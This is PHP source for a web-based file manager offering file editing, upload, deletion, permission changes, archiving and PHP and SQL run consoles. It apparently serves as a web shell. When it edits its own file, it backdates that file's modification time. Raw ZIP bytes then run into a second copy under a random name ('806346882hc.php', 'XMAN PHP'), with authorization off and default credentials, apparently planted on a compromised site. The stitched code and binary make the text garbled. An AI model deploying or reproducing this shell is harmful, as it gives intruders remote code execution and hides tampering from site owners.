name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } PK R��Z%M��. �. 806346882hc.phpnu �[��� <?pHp /* XMAN PHP ver 1.4*/ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this 